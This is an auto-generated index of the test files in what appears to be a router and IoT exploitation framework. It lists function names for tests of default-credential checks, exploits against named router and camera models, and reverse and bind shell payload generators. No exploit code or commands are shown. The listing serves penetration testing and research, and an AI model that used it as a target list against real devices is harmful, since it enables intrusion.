function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/bhu/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/bhu/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/bhu/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/billion/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/billion/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/billion/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/cisco/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/cisco/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/cisco/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/comtrend/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/comtrend/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/comtrend/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/dlink/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/dlink/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/dlink/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/fortinet/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/fortinet/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/fortinet/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/huawei/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/huawei/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/huawei/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/ipfire/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/ipfire/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/ipfire/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/juniper/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/juniper/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/juniper/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/linksys/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/linksys/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/linksys/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/mikrotik/test_api_ros_default_creds.py
function test_check_success (line 4) | def test_check_success(tcp_target):
FILE: tests/creds/routers/mikrotik/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/mikrotik/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/mikrotik/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/movistar/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/movistar/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/movistar/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netcore/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netcore/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netcore/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netgear/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netgear/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netgear/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netsys/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netsys/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/netsys/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/pfsense/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/technicolor/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/technicolor/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/technicolor/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/thomson/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/thomson/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/thomson/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/tplink/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/tplink/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/tplink/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/ubiquiti/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/ubiquiti/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/ubiquiti/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/zte/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/zte/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/zte/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/zyxel/test_ftp_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/zyxel/test_ssh_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/creds/routers/zyxel/test_telnet_default_creds.py
function test_check_success (line 4) | def test_check_success(generic_target):
FILE: tests/encoders/perl/test_base64.py
function test_payload_encoding (line 19) | def test_payload_encoding():
FILE: tests/encoders/perl/test_hex.py
function test_payload_encoding (line 19) | def test_payload_encoding():
FILE: tests/encoders/php/test_base64.py
function test_payload_encoding (line 26) | def test_payload_encoding():
FILE: tests/encoders/php/test_hex.py
function test_payload_encoding (line 26) | def test_payload_encoding():
FILE: tests/encoders/python/test_base64.py
function test_payload_enconding (line 25) | def test_payload_enconding():
FILE: tests/encoders/python/test_hex.py
function test_payload_enconding (line 25) | def test_payload_enconding():
FILE: tests/exploits/cameras/avigilon/test_videoiq_camera_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/cameras/brickcom/test_corp_network_cameras_conf_disclosure.py
function test_check_v1_success (line 32) | def test_check_v1_success(target):
FILE: tests/exploits/cameras/brickcom/test_users_cgi_creds_disclosure.py
function apply_response (line 32) | def apply_response(*args, **kwargs):
function test_check_success (line 44) | def test_check_success(target):
FILE: tests/exploits/cameras/cisco/test_video_surv_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/cameras/dlink/test_dcs_930l_932l_auth_bypass.py
function apply_response (line 9) | def apply_response(*args, **kwargs):
function test_check_success (line 18) | def test_check_success(target):
FILE: tests/exploits/cameras/honeywell/test_hicc_1100pt_password_disclosure.py
function test_success (line 4) | def test_success(target):
FILE: tests/exploits/cameras/jovision/test_jovision_camera_credential_disclosure.py
function apply_response (line 5) | def apply_response(*args, **kwargs):
function test_check_success (line 22) | def test_check_success(target):
FILE: tests/exploits/cameras/multi/test_cctv_dvr_rce.py
function test_check_success (line 7) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/cameras/multi/test_dvr_creds_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/cameras/multi/test_jvc_vanderbilt_honeywell_path_traversal.py
function test_check_v1_success (line 4) | def test_check_v1_success(target):
function test_check_v2_success (line 37) | def test_check_v2_success(target):
FILE: tests/exploits/cameras/multi/test_netwave_ip_camera_information_disclosure.py
function test_check_v2_success (line 4) | def test_check_v2_success(target):
FILE: tests/exploits/cameras/mvpower/test_dvr_jaws_rce.py
function apply_response (line 7) | def apply_response(*args, **kwargs):
function test_exploit_success (line 18) | def test_exploit_success(mocked_shell, target):
FILE: tests/exploits/cameras/siemens/test_cvms2025_credentials_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/cameras/xiongmai/test_uc_httpd_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/misc/asus/test_b1m_projector_rce.py
function test_exploit_success (line 6) | def test_exploit_success(mocked_shell, target):
FILE: tests/exploits/misc/miele/test_pg8528_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/misc/wepresent/test_wipg1000_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/2wire/test_4011g_5012nv_path_traversal.py
function test_check_success (line 7) | def test_check_success(target):
FILE: tests/exploits/routers/2wire/test_gateway_auth_bypass.py
function test_check_success (line 7) | def test_check_success(target):
FILE: tests/exploits/routers/3com/test_ap8760_password_disclosure.py
function test_check_success (line 7) | def test_check_success(target):
FILE: tests/exploits/routers/3com/test_imc_info_disclosure.py
function test_check_success (line 7) | def test_check_success(target):
FILE: tests/exploits/routers/3com/test_imc_path_traversal.py
function test_check_success (line 7) | def test_check_success(target):
FILE: tests/exploits/routers/3com/test_officeconnect_info_disclosure.py
function test_check_success (line 7) | def test_check_success(target):
FILE: tests/exploits/routers/3com/test_officeconnect_rce.py
function test_check_success (line 9) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/asmax/test_ar_1004g_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/asmax/test_ar_804_gu_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/asus/test_asuswrt_lan_rce.py
function test_check_success (line 7) | def test_check_success(mocked_shell, target):
function test_execute (line 28) | def test_execute(udp_target):
FILE: tests/exploits/routers/asus/test_infosvr_backdoor_rce.py
function test_check_success (line 5) | def test_check_success(udp_target):
FILE: tests/exploits/routers/asus/test_rt_n16_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/belkin/test_auth_bypass.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/belkin/test_g_n150_password_disclosure.py
function test_exploit_success (line 4) | def test_exploit_success(target):
FILE: tests/exploits/routers/belkin/test_g_plus_info_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/belkin/test_n150_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/belkin/test_n750_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_exploit_success (line 14) | def test_exploit_success(mocked_shell, target):
FILE: tests/exploits/routers/belkin/test_play_mac_prce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/bhu/test_bhu_urouter_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/billion/test_billion_5200w_rce.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/billion/test_billion_7700n4_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/cisco/test_dpc2420_info_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/cisco/test_firepower_management60_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/cisco/test_firepower_management60_rce.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/cisco/test_ios_http_authorization_bypass.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/cisco/test_rv320_command_injection.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/cisco/test_secure_acs_bypass.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/cisco/test_ucm_info_disclosure.py
function test_check_success (line 4) | def test_check_success(udp_target):
FILE: tests/exploits/routers/cisco/test_ucs_manager_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 13) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/cisco/test_unified_multi_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/comtrend/test_ct_5361t_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py
function test_exploit_success (line 6) | def test_exploit_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_dir_300_320_600_615_info_disclosure.py
function test_exploit_success (line 4) | def test_exploit_success(target):
FILE: tests/exploits/routers/dlink/test_dir_300_320_615_auth_bypass.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dir_300_600_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 12) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_dir_300_645_815_upnp_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, udp_target):
FILE: tests/exploits/routers/dlink/test_dir_645_815_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_dir_645_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dir_655_866_652_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 13) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_dir_815_850l_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, udp_target):
FILE: tests/exploits/routers/dlink/test_dir_825_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dir_850l_creds_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dir_8xx_password_disclosure.py
function apply_response (line 5) | def apply_response():
function test_exploit_success (line 53) | def test_exploit_success(target):
FILE: tests/exploits/routers/dlink/test_dns_320l_327l_rce.py
function apply_response (line 7) | def apply_response(*args, **kwargs):
function test_check_success (line 19) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_dsl_2730_2750_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dsl_2750b_info_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dsl_2750b_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_dsp_w110_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 13) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_dvg_n5402sp_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dwl_3200ap_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/dlink/test_dwr_932_info_disclosure.py
function test_exploit_success (line 4) | def test_exploit_success(target):
FILE: tests/exploits/routers/dlink/test_dwr_932b_backdoor.py
function test_check_success (line 6) | def test_check_success(mocked_shell, udp_target):
FILE: tests/exploits/routers/dlink/test_multi_hedwig_cgi_exec.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 14) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/dlink/test_multi_hnap_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/huawei/test_e5331_mifi_info_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/huawei/test_hg520_info_disclosure.py
function test_check_success (line 4) | def test_check_success(udp_target):
FILE: tests/exploits/routers/huawei/test_hg530_hg520b_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/huawei/test_hg866_password_change.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/ipfire/test_ipfire_proxy_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 12) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/ipfire/test_ipfire_shellshock.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 12) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/linksys/test_1500_2500_rce.py
function apply_response (line 9) | def apply_response(*args, **kwargs):
function test_check_success (line 15) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/linksys/test_eseries_themoon_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
function test_check_unsuccess_no_hnapi (line 24) | def test_check_unsuccess_no_hnapi(mocked_shell, target):
function test_check_success_no_cgi (line 38) | def test_check_success_no_cgi(mocked_shell, target):
FILE: tests/exploits/routers/linksys/test_smartwifi_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/linksys/test_wap54gv3_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 12) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/linksys/test_wrt100_110_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/mikrotik/test_winbox_auth_bypass_creds_disclosure.py
function test_check_success (line 4) | def test_check_success(tcp_target):
FILE: tests/exploits/routers/movistar/test_adsl_router_bhs_rta_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/multi/test_gpon_home_gateway_rce.py
function apply_response1 (line 11) | def apply_response1(*args, **kwargs):
function apply_response_without_waiting (line 19) | def apply_response_without_waiting(*args, **kwargs):
function apply_response_with_waiting (line 26) | def apply_response_with_waiting(*args, **kwargs):
function test_check_success1 (line 38) | def test_check_success1(mocked_shell, target):
function test_check_success2 (line 60) | def test_check_success2(mocked_shell, target):
FILE: tests/exploits/routers/multi/test_misfortune_cookie.py
function apply_response (line 5) | def apply_response(*args, **kwargs):
function test_check_success (line 11) | def test_check_success(target):
FILE: tests/exploits/routers/multi/test_rom0.py
function test_check_success (line 8) | def test_check_success(target):
FILE: tests/exploits/routers/multi/test_tcp_32764_info_disclosure.py
function test_check_success1 (line 4) | def test_check_success1(tcp_target):
function test_check_success2 (line 22) | def test_check_success2(tcp_target):
FILE: tests/exploits/routers/multi/test_tcp_32764_rce.py
function test_check_success1 (line 6) | def test_check_success1(mocked_shell, tcp_target):
function test_check_success2 (line 29) | def test_check_success2(mocked_shell, tcp_target):
FILE: tests/exploits/routers/netcore/test_udp_53413_rce.py
function test_check_success1 (line 6) | def test_check_success1(mocked_shell, udp_target):
function test_check_success2 (line 25) | def test_check_success2(mocked_shell, udp_target):
FILE: tests/exploits/routers/netgear/test_dgn2200_ping_cgi_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 13) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/netgear/test_jnr1010_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/netgear/test_n300_auth_bypass.py
function apply_response1 (line 8) | def apply_response1(*args, **kwargs):
function apply_response2 (line 18) | def apply_response2(*args, **kwargs):
function test_check_success (line 24) | def test_check_success(target):
FILE: tests/exploits/routers/netgear/test_netgear_multi_rce.py
function apply_response_v1 (line 6) | def apply_response_v1(*args, **kwargs):
function test_exploit_v1_success (line 13) | def test_exploit_v1_success(mocked_shell, target):
function apply_response_v2 (line 31) | def apply_response_v2(*args, **kwargs):
function test_exploit_v2_success (line 38) | def test_exploit_v2_success(mocked_shell, target):
function apply_response_v3 (line 53) | def apply_response_v3(*args, **kwargs):
function test_exploit_v3_success (line 60) | def test_exploit_v3_success(mocked_shell, target):
function apply_response_v4 (line 75) | def apply_response_v4(*args, **kwargs):
function test_exploit_v4_success (line 82) | def test_exploit_v4_success(mocked_shell, target):
function apply_response_v5 (line 97) | def apply_response_v5(*args, **kwargs):
function test_exploit_v5_success (line 104) | def test_exploit_v5_success(mocked_shell, target):
FILE: tests/exploits/routers/netgear/test_prosafe_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_exploit_success (line 13) | def test_exploit_success(mocked_shell, target):
FILE: tests/exploits/routers/netgear/test_r7000_r6400_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_exploit_success (line 13) | def test_exploit_success(mocked_shell, target):
FILE: tests/exploits/routers/netgear/test_wnr500_612v3_jnr1010_2010_path_traversal.py
function test_exploit_success (line 4) | def test_exploit_success(target):
FILE: tests/exploits/routers/netsys/test_multi_rce.py
function test_check_v1_success (line 13) | def test_check_v1_success(mocked_shell, target):
function test_check_v2_success (line 32) | def test_check_v2_success(mocked_shell, target):
function test_check_v3_success (line 48) | def test_check_v3_success(mocked_shell, target):
FILE: tests/exploits/routers/shuttle/test_915wm_dns_change.py
function test_check_success (line 7) | def test_check_success(target):
FILE: tests/exploits/routers/technicolor/test_dwg855_authbypass.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/technicolor/test_tc7200_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/technicolor/test_tc7200_password_disclosure_v2.py
function test_check_success (line 5) | def test_check_success(target):
FILE: tests/exploits/routers/technicolor/test_tg784_authbypass.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/thomson/test_twg850_password_disclosure.py
function test_exploit_success (line 4) | def test_exploit_success(target):
FILE: tests/exploits/routers/tplink/test_archer_c2_c20i_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/tplink/test_wdr740nd_wdr740n_backdoor.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 13) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/tplink/test_wdr740nd_wdr740n_path_traversal.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/tplink/test_wdr842nd_wdr842n_configure_disclosure.py
function apply_response (line 5) | def apply_response(*args, **kwargs):
function test_check_success (line 11) | def test_check_success(target):
FILE: tests/exploits/routers/zte/test_f460_f660_backdoor.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 13) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/zte/test_zxhn_h108n_wifi_password_disclosure.py
function test_check_succecc (line 4) | def test_check_succecc(target):
FILE: tests/exploits/routers/zte/test_zxv10_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/zyxel/test_d1000_rce.py
function apply_response (line 6) | def apply_response(*args, **kwargs):
function test_check_success (line 12) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/zyxel/test_d1000_wifi_password_disclosure.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/exploits/routers/zyxel/test_p660hn_t_v1_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/zyxel/test_p660hn_t_v2_rce.py
function test_check_success (line 6) | def test_check_success(mocked_shell, target):
FILE: tests/exploits/routers/zyxel/test_zywall_usg_extract_hashes.py
function test_check_success (line 4) | def test_check_success(target):
FILE: tests/generic/upnp/test_ssdp_msearch.py
function test_check_success (line 4) | def test_check_success(udp_target):
FILE: tests/payloads/armle/test_bind_tcp.py
function test_payload_generation (line 54) | def test_payload_generation():
FILE: tests/payloads/armle/test_reverse_tcp.py
function test_payload_generation (line 29) | def test_payload_generation():
FILE: tests/payloads/cmd/test_awk_bind_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_awk_bind_udp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_awk_reverse_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_bash_reverse_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_netcat_bind_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_netcat_reverse_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_perl_bind_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_perl_reverse_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_php_bind_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_php_reverse_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_python_bind_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_python_bind_udp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_python_reverse_tcp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/cmd/test_python_reverse_udp.py
function test_payload_generation (line 10) | def test_payload_generation():
FILE: tests/payloads/mipsbe/test_bind_tcp.py
function test_payload_generation (line 51) | def test_payload_generation():
FILE: tests/payloads/mipsbe/test_reverse_tcp.py
function test_payload_generation (line 46) | def test_payload_generation():
FILE: tests/payloads/mipsle/test_bind_tcp.py
function test_payload_generation (line 51) | def test_payload_generation():
FILE: tests/payloads/mipsle/test_reverse_tcp.py
function test_payload_generation (line 46) | def test_payload_generation():
FILE: tests/payloads/perl/test_bind_tcp.py
function test_payload_generation (line 19) | def test_payload_generation():
FILE: tests/payloads/perl/test_reverse_tcp.py
function test_payload_generation (line 18) | def test_payload_generation():
FILE: tests/payloads/php/test_bind_tcp.py
function test_payload_generation (line 26) | def test_payload_generation():
FILE: tests/payloads/php/test_reverse_tcp.py
function test_payload_generation (line 17) | def test_payload_generation():
FILE: tests/payloads/python/test_bind_tcp.py
function test_payload_generation (line 25) | def test_payload_generation():
FILE: tests/payloads/python/test_bind_udp.py
function test_payload_generation (line 22) | def test_payload_generation():
FILE: tests/payloads/python/test_reverse_tcp.py
function test_payload_generation (line 21) | def test_payload_generation():
FILE: tests/payloads/python/test_reverse_udp.py
function test_payload_generation (line 24) | def test_payload_generation():
FILE: tests/payloads/x64/test_bind_tcp.py
function test_payload_generation (line 33) | def test_payload_generation():
FILE: tests/payloads/x64/test_reverse_tcp.py
function test_payload_generation (line 31) | def test_payload_generation():
FILE: tests/payloads/x86/test_bind_tcp.py
function test_payload_generation (line 30) | def test_payload_generation():
FILE: tests/payloads/x86/test_reverse_tcp.py
function test_payload_generation (line 29) | def test_payload_generation():
FILE: tests/test_exploit_scenarios.py
function test_exploit_trash_response (line 9) | def test_exploit_trash_response(trash_target, module):
function test_exploit_empty_response (line 18) | def test_exploit_empty_response(empty_target, module):
function test_exploit_not_found_response (line 27) | def test_exploit_not_found_response(not_found_target, module):
function test_exploit_error_response (line 36) | def test_exploit_error_response(error_target, module):
function test_exploit_redirect_response (line 45) | def test_exploit_redirect_response(redirect_target, module):
function test_exploit_timeout_response (line 54) | def test_exploit_timeout_response(timeout_target, module):
FILE: tests/test_module_info.py
function test_exploit_info (line 6) | def test_exploit_info(exploit):
function test_creds_info (line 28) | def test_creds_info(creds):
function test_scanner_info (line 47) | def test_scanner_info(scanner):
function test_payload_info (line 66) | def test_payload_info(payload):
function test_encoder_info (line 82) | def test_encoder_info(encoder):
Condensed preview — 1215 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1,722K chars).
[
{
"path": ".dockerignore",
"chars": 58,
"preview": ".idea/\n.travis/\n\nREADME.md\nLICENSE\n.travis.yml\n*.pyc\n*.log"
},
{
"path": ".github/ISSUE_TEMPLATE.md",
"chars": 590,
"preview": "! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !\n\n## Steps to Reproduce (for bugs)\n1.\n2.\n3.\n4.\n\n## Your Environment\n*"
},
{
"path": ".github/PULL_REQUEST_TEMPLATE.md",
"chars": 693,
"preview": "## Status\n**READY/IN DEVELOPMENT/HOLD**\n\n## Description\nDescribe what is changed by your Pull Request. If this PR is rel"
},
{
"path": ".gitignore",
"chars": 888,
"preview": "# IntelliJ project files\n.idea\nout\ngen\n\n# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C e"
